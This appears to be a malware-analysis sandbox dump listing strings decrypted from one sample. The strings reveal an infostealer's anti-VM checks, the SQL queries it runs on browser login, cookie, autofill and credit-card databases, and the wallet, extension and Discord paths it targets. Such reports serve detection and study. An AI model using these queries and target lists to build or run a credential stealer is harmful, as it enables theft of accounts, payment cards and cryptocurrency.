Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetProcessHeap
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetCurrentProcess
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: lstrlenA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: ExitProcess
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetSystemTime
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: advapi32.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: gdi32.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: user32.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: crypt32.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: ntdll.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetUserNameA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CreateDCA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetDeviceCaps
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: ReleaseDC
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: sscanf
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: VMwareVMware
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: HAL9TH
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: JohnDoe
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: DISPLAY
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetFileAttributesA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GlobalLock
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: HeapFree
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetFileSize
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GlobalSize
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: IsWow64Process
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Process32Next
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetLocalTime
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: FreeLibrary
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetVolumeInformationA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Process32First
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetModuleFileNameA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: DeleteFileA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: FindNextFileA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: LocalFree
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: FindClose
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: LocalAlloc
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetFileSizeEx
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: ReadFile
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SetFilePointer
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: WriteFile
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CreateFileA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: FindFirstFileA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CopyFileA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: VirtualProtect
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetLastError
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: lstrcpynA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: MultiByteToWideChar
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GlobalFree
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: WideCharToMultiByte
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GlobalAlloc
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: OpenProcess
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: TerminateProcess
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetCurrentProcessId
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: gdiplus.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: ole32.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: bcrypt.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: wininet.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: shell32.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: psapi.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: rstrtmgr.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SelectObject
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: BitBlt
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: DeleteObject
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CreateCompatibleDC
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GdiplusStartup
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GdiplusShutdown
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GdipDisposeImage
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GdipFree
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CoUninitialize
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CoInitialize
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CoCreateInstance
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: BCryptDecrypt
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: BCryptSetProperty
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: BCryptDestroyKey
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetWindowRect
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetDesktopWindow
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetDC
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CloseWindow
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: wsprintfA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CharToOemW
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: wsprintfW
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: RegQueryValueExA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: RegEnumKeyExA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: RegOpenKeyExA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: RegCloseKey
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: RegEnumValueA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CryptUnprotectData
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SHGetFolderPathA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: ShellExecuteExA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: InternetOpenUrlA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: InternetConnectA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: InternetCloseHandle
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: InternetOpenA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: HttpSendRequestA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: HttpOpenRequestA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: InternetReadFile
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: InternetCrackUrlA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: StrCmpCA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: StrStrA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: StrCmpCW
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: PathMatchSpecA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: RmStartSession
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: RmRegisterResources
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: RmGetList
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: RmEndSession
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: sqlite3_open
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: sqlite3_step
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: sqlite3_column_text
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: sqlite3_finalize
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: sqlite3_close
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: sqlite3_column_blob
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: encrypted_key
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: PATH
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: NSS_Init
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: NSS_Shutdown
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: PK11_FreeSlot
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: PK11_Authenticate
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: C:\ProgramData\
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Soft:
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: profile:
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Host:
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Login:
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Password:
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Opera
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: OperaGX
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Network
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Cookies
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: .txt
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: TRUE
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: FALSE
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Autofill
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: History
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Name:
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Month:
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Year:
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Card:
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Cookies
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Login Data
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Web Data
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: History
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: logins.json
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: formSubmitURL
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: usernameField
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: encryptedUsername
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: encryptedPassword
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: guid
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: cookies.sqlite
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: formhistory.sqlite
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: places.sqlite
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Plugins
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Local Extension Settings
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Sync Extension Settings
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: IndexedDB
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Opera Stable
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Opera GX Stable
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CURRENT
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: chrome-extension_
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Local State
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: profiles.ini
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: chrome
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: opera
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: firefox
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Wallets
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: ProductName
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: ProcessorNameString
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: DisplayName
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: DisplayVersion
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: freebl3.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: mozglue.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: msvcp140.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: nss3.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: softokn3.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: vcruntime140.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: \Temp\
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: .exe
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: runas
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: open
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: /c start
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %DESKTOP%
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %APPDATA%
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %USERPROFILE%
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %DOCUMENTS%
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: %RECENT%
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: *.lnk
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Files
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: \discord\
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: \Local Storage\leveldb
